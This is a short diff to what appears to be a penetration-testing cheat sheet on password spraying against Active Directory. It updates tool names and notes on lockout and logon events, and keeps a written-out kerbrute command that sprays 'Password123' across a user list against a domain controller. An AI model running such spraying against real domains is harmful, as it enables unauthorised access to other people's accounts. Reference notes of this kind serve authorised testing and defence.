 Password Spraying

-# CrackMapExec — spray one password across all users (avoid lockout)
+# NetExec — spray one password across all users (check lockout policy first!)

-# Kerbrute — fast Kerberos-based spray (no failed logon events)
+# Kerbrute — Kerberos-based spray (generates fewer failed logon events than SMB)

 kerbrute passwordspray -d domain.local --dc 10.10.10.1 users.txt 'Password123'